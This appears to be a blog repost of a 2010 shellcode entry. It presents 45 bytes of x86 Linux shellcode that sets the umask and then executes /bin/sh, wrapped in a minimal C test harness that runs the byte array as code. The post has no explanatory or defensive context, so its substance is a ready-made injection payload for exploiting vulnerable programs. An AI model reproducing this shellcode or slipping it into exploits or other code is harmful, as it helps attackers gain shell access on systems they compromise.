break a time, with break the c0de…

45 bytes sys_execve(“/bin/sh”, “0”, “0”) with umask 16 (sys_umask(14)) x86 linux shellcode


/*
Name   : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslinger.devilzc0de.com
tested on : linux debian
*/

int main(){
	char shell[] =  "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
			"\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
			"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
			"\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
			"\x2f\x62\x69\x6e\x2f\x73\x68";

	(*(void (*)()) shell)();
}
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s